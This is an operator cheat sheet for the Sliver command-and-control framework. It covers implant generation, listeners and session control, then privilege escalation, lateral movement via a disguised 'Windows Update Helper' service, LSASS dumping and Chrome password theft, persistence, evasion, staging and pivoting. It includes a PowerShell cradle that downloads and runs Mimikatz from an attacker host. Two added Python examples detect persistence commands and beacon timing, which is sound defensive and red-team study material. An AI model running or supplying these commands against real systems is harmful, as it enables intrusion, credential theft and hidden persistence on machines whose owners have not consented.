
Sliver C2

Sliver is an open-source C2 framework written in Go with capabilities comparable to Cobalt Strike. It supports multi-protocol comms (mTLS, WireGuard, HTTP(S), DNS), cross-platform implants (Windows, Linux, macOS), and two implant modes: interactive sessions and beacons that check in on an interval.

Installation

Linux/macOS

# Official installer (fetches the latest release binaries; read the script before piping it into a root shell)
curl https://sliver.sh/install | sudo bash

# Or build from source (needs a recent Go toolchain; produces ./sliver-server and ./sliver-client)
git clone https://github.com/BishopFox/sliver.git
cd sliver
make

# Run the server; on first start it generates its CA and certificates, then drops into a server console
./sliver-server

Docker

# Build Docker image from the repository checkout
docker build -t sliver:latest .

# Run server container; the volume keeps ~/.sliver (CA, certificates, implant builds, operator configs) across restarts
docker run -it --rm -v ~/.sliver:/root/.sliver sliver:latest

Server Commands

Command          Description
sliver-server    Start the C2 server (opens a server console; sliver-server daemon runs it headless)
sliver           Operator client; connects using a config made with sliver-server operator --name <op> --lhost <ip> --save <file>
help             Display available commands (help <command> shows a command's flags)
sessions         List active sessions (beacons lists beacons)
jobs             List running listeners and other background jobs
generate         Create an implant binary (generate beacon for beacon mode)

Generating Implants

HTTP and mTLS Implants

sliver > generate --http 192.168.1.100 --save /tmp/implant.exe
# Creates an HTTP(S) session implant calling back to 192.168.1.100 (--http takes host[:port] or a URL; --lhost/--lport are listener flags, not generate flags)

sliver > generate --mtls 192.168.1.100:8443 --save /tmp/implant
# Creates an mTLS implant connecting to 192.168.1.100:8443 (the default mTLS port is 8888 if none is given)

sliver > generate beacon --mtls 192.168.1.100:8443 --seconds 60 --jitter 30 --save /tmp/beacon.exe
# Beacon-mode implant: checks in every 60 s plus up to 30 s of jitter instead of holding an open session

WireGuard Implant

sliver > generate --wg 192.168.1.100 --save /tmp/agent.exe
# Creates an implant that carries its C2 inside a WireGuard tunnel to the server's wg listener (UDP 53 by default); --wg needs the server address

DNS Implant

sliver > generate --dns c2.example.com --save /tmp/dns_agent
# C2 over ordinary DNS queries for a domain whose NS records point at the Sliver server. This is not DNS-over-HTTPS, and a .local name would never resolve through public DNS

Cross-Platform

sliver > generate --os windows --arch amd64 --mtls 192.168.1.100:8443 --save /tmp/
sliver > generate --os linux --arch amd64 --mtls 192.168.1.100:8443 --save /tmp/
sliver > generate --os macos --arch arm64 --mtls 192.168.1.100:8443 --save /tmp/
# Every implant needs at least one C2 flag (--mtls/--http/--wg/--dns). --format is exe (an ELF on Linux, Mach-O on macOS), shared, service or shellcode; there is no elf format. Windows shared/shellcode builds need mingw-w64 installed on the server

Listener Management

Command                              Description
jobs                                 List active listeners (there is no listeners command; listeners are jobs)
mtls --lhost 0.0.0.0 --lport 8443    Start mTLS listener
http --lhost 0.0.0.0 --lport 80      Start HTTP listener
https --lhost 0.0.0.0 --lport 443    Start HTTPS listener (self-signed unless --cert/--key are supplied)
dns --domains c2.example.com         Start DNS listener (UDP 53) for a domain delegated to this server
jobs -k <JOB_ID>                     Stop a listener

Session Operations

# List sessions (interactive) and beacons (periodic check-in)
sliver > sessions
sliver > beacons

# Interact with a session or beacon
sliver > use <SESSION_ID>

# Background the current session
[session] > background

# Kill: from inside the session, or by ID from the main menu (add --force if the implant does not answer)
[session] > kill
sliver > sessions -k <SESSION_ID>

# Info about the current session
[session] > info

# Beacons queue commands; collect results with tasks, or open a live session from a beacon with interactive
[beacon] > tasks
[beacon] > interactive

Beacon/Implant Commands

# Execute a command; -o returns its output (without -o the command runs but nothing comes back)
[session] > execute -o /bin/bash -c "whoami"

# Interactive shell
[session] > shell

# Download file
[session] > download /etc/passwd /tmp/passwd

# Upload file
[session] > upload /tmp/payload /tmp/payload

# List files
[session] > ls /home/user

# Process listing
[session] > ps

# Change directory
[session] > cd /var/www

# Get current user
[session] > whoami

# Check hostname
[session] > hostname

Privilege Escalation

# Run a .NET assembly in memory (Windows)
[session] > execute-assembly /tmp/Seatbelt.exe -group=system

# Get SYSTEM from an already-elevated session (Windows)
[session] > getsystem

# Token impersonation (Windows; the target user must have a logon session on the host)
[session] > impersonate DOMAIN\Administrator

# Sliver has no built-in UAC bypass. The line below only raises a UAC consent prompt on the user's desktop; a real bypass has to come from a separate tool run via execute-assembly or sideload
[session] > execute powershell.exe -NoP -C "Start-Process cmd.exe -Verb RunAs"

Lateral Movement

# PsExec-style lateral movement (Windows): needs a profile built as a Windows service, which psexec uploads and starts on the target over SMB/SCM using the current token
sliver > profiles new --mtls 192.168.1.100:8443 --os windows --format service win-svc
[session] > psexec --profile win-svc --service-name UpdateSvc --service-description "Windows Update Helper" target.example.com

# WMI, WinRM and pass-the-hash have no native Sliver commands. Either run the .NET tooling in memory with execute-assembly, or proxy the usual tools (impacket and friends) from the operator box through the implant (sessions only)
[session] > socks5 start --host 127.0.0.1 --port 1081

Data Exfiltration

# Screenshot (needs an interactive desktop on the host)
[session] > screenshot

# Sliver has no built-in keylogger; if one is in scope it has to be brought as a separate tool (execute-assembly/sideload)

# Dump LSASS for offline credential extraction (Windows, needs admin; EDRs alert on this)
[session] > procdump --name lsass.exe --save /tmp/lsass.dmp

# Enumerate local accounts (this lists accounts, it does not dump credentials)
[session] > execute -o powershell.exe -NoP -C "Get-LocalUser"

# Extract Chrome passwords, then keep track of what was taken
[session] > execute -o powershell.exe -NoP -C "[...]Chrome password extractor script[...]"
sliver > loot

Persistence

# Scheduled task (Windows; an AtStartup trigger needs admin). New-ScheduledTask only builds an object in memory; Register-ScheduledTask is what actually creates the task
[session] > execute -o powershell.exe -NoP -C "Register-ScheduledTask -TaskName 'Update' -Trigger (New-ScheduledTaskTrigger -AtStartup) -Action (New-ScheduledTaskAction -Execute 'C:\temp\beacon.exe') -User 'SYSTEM' -RunLevel Highest"

# Registry Run key (runs at the current user's logon; no admin needed)
[session] > execute -o powershell.exe -NoP -C "Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'Update' -Value 'C:\temp\beacon.exe'"

# Service installation (needs admin). The binary must be a real service executable, i.e. built with generate --format service; the SCM kills a plain exe shortly after start
[session] > execute -o sc.exe create UpdateService binPath= "C:\temp\beacon.exe" start= auto
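The defender's view of the three persistence commands above, as an added example written for this page (not Sliver's or Sysmon's code). The log lines are constructed for the example, in a flattened key=value form loosely modelled on Sysmon event 1 (process create) and event 13 (registry value set); the implant path C:\temp\beacon.exe, the rule patterns and the list of expected parent processes are all assumptions of the example:

```python
"""Detection logic for the scheduled-task, Run-key and service persistence commands.
Sample lines are CONSTRUCTED (not real telemetry) and the rules are this example's own."""
import re

SAMPLE_LOGS = [
    "EventID=1|ParentImage=C:\\temp\\beacon.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|CommandLine=powershell.exe -NoP -C \"Register-ScheduledTask -TaskName 'Update' -Trigger (New-ScheduledTaskTrigger -AtStartup) -Action (New-ScheduledTaskAction -Execute 'C:\\temp\\beacon.exe')\"",
    "EventID=13|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|TargetObject=HKU\\S-1-5-21-1004336348-1177238915-682003330-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Update|Details=C:\\temp\\beacon.exe",
    "EventID=1|ParentImage=C:\\temp\\beacon.exe|Image=C:\\Windows\\System32\\sc.exe|CommandLine=sc.exe create UpdateService binPath= \"C:\\temp\\beacon.exe\" start= auto",
    # Benign noise: an admin querying a service, and a user listing tasks
    "EventID=1|ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\cmd.exe|CommandLine=cmd.exe /c sc query wuauserv",
    "EventID=1|ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|CommandLine=powershell.exe -NoP -C \"Get-ScheduledTask -TaskName Update\"",
]

RULES = [
    # (rule name, event id it applies to, field to inspect, pattern)
    ("scheduled-task", 1, "CommandLine", re.compile(r"schtasks(\.exe)?\s+/create|Register-ScheduledTask", re.I)),
    ("service-install", 1, "CommandLine", re.compile(r"\bsc(\.exe)?\s+create\b.*\bbinpath\s*=", re.I)),
    ("run-key", 13, "TargetObject", re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)),
]

# Parents that normally launch admin tooling. Sliver's execute spawns the child directly
# under the implant process, so the parent is whatever the implant binary is called.
EXPECTED_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "services.exe", "svchost.exe"}


def parse_event(line: str) -> dict:
    """Split one flattened line into fields; only the first '=' of each field is a separator."""
    return dict(field.split("=", 1) for field in line.split("|"))


def detect_persistence(lines: list[str]) -> list[dict]:
    """Return one hit per (line, rule) match, noting whether the parent process is unexpected."""
    hits = []
    for idx, line in enumerate(lines):
        ev = parse_event(line)
        eid = int(ev["EventID"])
        parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
        for name, rule_eid, field, pattern in RULES:
            if eid == rule_eid and pattern.search(ev.get(field, "")):
                hits.append({
                    "line": idx,
                    "rule": name,
                    # Registry events carry no parent, so the parent check only applies to process creates
                    "odd_parent": eid == 1 and parent not in EXPECTED_PARENTS,
                    "payload": ev.get("Details") or ev.get("CommandLine"),
                })
    return hits


if __name__ == "__main__":
    for hit in detect_persistence(SAMPLE_LOGS):
        flag = " (unexpected parent)" if hit["odd_parent"] else ""
        print(f"line {hit['line']}: {hit['rule']}{flag}: {hit['payload'][:60]}")
```

The two benign lines exercise the rules' boundaries: `sc query` is not `sc create`, and `Get-ScheduledTask` is not `Register-ScheduledTask`. The parent check is what separates an operator typing these commands from an implant doing it; for the Run key, which arrives as a registry event, the process-creation line that wrote it is what carries that parent.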

Evasion Techniques

# In-memory execution: .NET assemblies via execute-assembly, raw shellcode via execute-shellcode, DLLs via sideload
[session] > execute-assembly /tmp/Seatbelt.exe -group=system
[session] > execute-shellcode /tmp/payload.bin

# Environment-variable indirection in cmd.exe. %x% is expanded before set runs, so delayed expansion (!x!) is required for this to work
[session] > execute cmd.exe /V:ON /c "set x=calc.exe && !x!"

# PPID spoofing is a flag on the in-memory loaders (execute-assembly, sideload, spawndll), not on execute
[session] > execute-assembly --ppid 1234 /tmp/Seatbelt.exe -group=system

# Check-in interval and jitter (beacons only; sessions hold a connection and do not sleep)
[beacon] > reconfig --interval 1h --jitter 10m

DNS Tunneling

# Start a DNS listener. The domain must be delegated to the Sliver server with an NS record at the registrar/DNS provider, or no query ever reaches it
sliver > dns --domains c2.example.com

# Generate an implant that talks C2 over DNS to that domain
sliver > generate --dns c2.example.com --save /tmp/dns_agent

# Sliver DNS C2 uses plain DNS through whatever resolvers the host already has; it is not DNS-over-HTTPS, there is no dns-config command, and each query carries only a few dozen bytes, so treat it as a slow fallback channel

Staging

# Staging needs an implant profile; the stage listener serves an implant built from it. The profile must be in shellcode format because the stager loads what it downloads
sliver > profiles new --http 192.168.1.100 --os windows --format shellcode win-http
sliver > stage-listener --url http://192.168.1.100:8080 --profile win-http

# Generate a small stager that fetches the full implant from the stage listener (msfvenom-based, so Metasploit must be installed on the server)
sliver > generate stager --lhost 192.168.1.100 --lport 8080 --protocol http --format raw --save /tmp/stage1.bin

# Deliver stage 1 -> stage 2
# Stage 1 connects to the stage listener, downloads the full implant and runs it in memory; anyone who can reach the listener can download the stage, so do not leave it running longer than needed

Traffic Rules

# Sliver has no route-add or tun-device commands; reach internal networks through the implant with port forwards, a SOCKS proxy, or pivot listeners (port forwards and SOCKS are session-only)

# Forward a local port on the operator box through the implant to an internal host
[session] > portfwd add --remote 10.0.0.5:3389 --bind 127.0.0.1:33389
[session] > portfwd

# SOCKS5 proxy through the implant (pair with proxychains on the operator box)
[session] > socks5 start --host 127.0.0.1 --port 1081

# Pivot: have a compromised host listen for new implants that cannot egress directly
[session] > pivots tcp --bind 0.0.0.0 --lport 9898
sliver > generate --tcp-pivot 10.0.0.5:9898 --save /tmp/pivot_implant.exe

# WireGuard implants get the same with wg-portfwd and wg-socks

Cleanup and Exit

# Terminate the implant process from inside the session, or by ID from the main menu
[session] > kill
sliver > sessions -k <SESSION_ID>
sliver > sessions -K          # kill all sessions

# Stop listeners (jobs)
sliver > jobs -k <JOB_ID>
sliver > jobs -K              # stop all jobs

# kill only ends the process: any implant written to disk and any persistence you created stays until you remove it yourself

# Leave the console. There is no stop or cleanup-all command; the server keeps running until the sliver-server process (or container) is stopped
sliver > exit

Advanced Post-Exploitation

# BloodHound collection: run SharpHound in memory (Invoke-BloodHound only exists once SharpHound.ps1 has been loaded into the PowerShell process)
[session] > execute-assembly /tmp/SharpHound.exe -c All -d DOMAIN.LOCAL

# Rubeus for Kerberos attacks (the action is kerberoast, not roast)
[session] > execute-assembly /tmp/Rubeus.exe kerberoast /format:hashcat

# SharpView domain enumeration
[session] > execute-assembly /tmp/SharpView.exe Get-DomainUser

# Mimikatz via a PowerShell download cradle: nothing touches disk, but AMSI, script-block logging and the outbound fetch all make this loud
[session] > execute -o powershell.exe -NoP -C "IEX (New-Object Net.WebClient).DownloadString('https://attacker.com/Invoke-Mimikatz.ps1'); Invoke-Mimikatz"

Network Reconnaissance

# ARP cache (no native Sliver command for this; run the host's own tool)
[session] > execute -o arp -a

# Network interfaces (ifconfig equivalent, all platforms)
[session] > ifconfig

# Listening sockets and connections
[session] > netstat

# Windows interface details
[session] > execute -o ipconfig /all

Best Practices

  • Use mTLS or HTTPS as the primary C2 channel; plain HTTP exposes tasking to any inline inspection
  • Keep DNS as a low-bandwidth fallback channel, not the primary one
  • Prefer beacons (generate beacon --seconds/--jitter) over always-on sessions, and add jitter so check-ins are not evenly spaced
  • Use multiple listener types for failover
  • Regenerate implants between engagements; each build gets fresh certificates and obfuscated symbols
  • Kill sessions, stop jobs, and remove on-disk implants and persistence post-operation
  • Review operator logs for OPSEC violations
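What jitter buys and what it does not, as an added example written for this page (not Sliver's code). It models the check-in schedule that generate beacon --seconds N --jitter J (or reconfig at runtime) produces, assuming the added delay is uniformly distributed between 0 and J seconds, then applies two naive detector rules to the resulting timestamps; the thresholds 0.05 and 2.0 are assumptions of the example:

```python
"""Beacon check-in timing as a defender sees it. Assumes Sliver's jitter is a uniform
delay in [0, J] added to the base interval N; the detector thresholds are illustrative."""
import random
import statistics


def beacon_checkins(interval: float, jitter: float, count: int, seed: int = 1) -> list[float]:
    """Timestamps (seconds from start) of `count` check-ins; seeded so runs are repeatable."""
    rng = random.Random(seed)
    t, times = 0.0, []
    for _ in range(count):
        t += interval + (rng.uniform(0, jitter) if jitter > 0 else 0.0)
        times.append(t)
    return times


def interarrival_stats(timestamps: list[float]) -> dict:
    """Mean, spread and coefficient of variation (std/mean) of the gaps between check-ins."""
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    mean = statistics.fmean(gaps)
    std = statistics.pstdev(gaps)
    return {"mean": mean, "std": std, "cv": std / mean, "min": min(gaps), "max": max(gaps)}


def classify(timestamps: list[float], cv_threshold: float = 0.05, span_ratio: float = 2.0) -> str:
    """Two naive detector rules. A fixed interval trips the CV rule; uniform jitter
    defeats it but keeps every gap inside [N, N+J], which the span rule still catches."""
    s = interarrival_stats(timestamps)
    if s["cv"] < cv_threshold:
        return "periodic"
    if s["max"] / s["min"] < span_ratio:
        return "bounded-jitter"
    return "none"


if __name__ == "__main__":
    for label, jitter in (("--seconds 60 --jitter 0", 0), ("--seconds 60 --jitter 30", 30)):
        times = beacon_checkins(60, jitter, 200)
        s = interarrival_stats(times)
        print(f"{label}: mean={s['mean']:.1f}s cv={s['cv']:.3f} "
              f"range=[{s['min']:.1f}, {s['max']:.1f}] -> {classify(times)}")
```

The fixed beacon has zero variance and is caught by the simplest periodicity check. Adding 50% jitter lifts the coefficient of variation to roughly 0.12, past a naive threshold, but every gap still lands between 60 and 90 seconds, so a rule that looks at the gap range instead of its variance flags it anyway. The practical reading of the "randomize beacon intervals" bullet is therefore: jitter has to be a large fraction of the interval, and the interval itself should change over the engagement (reconfig --interval), because a bounded uniform spread is easy to characterise.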

Resources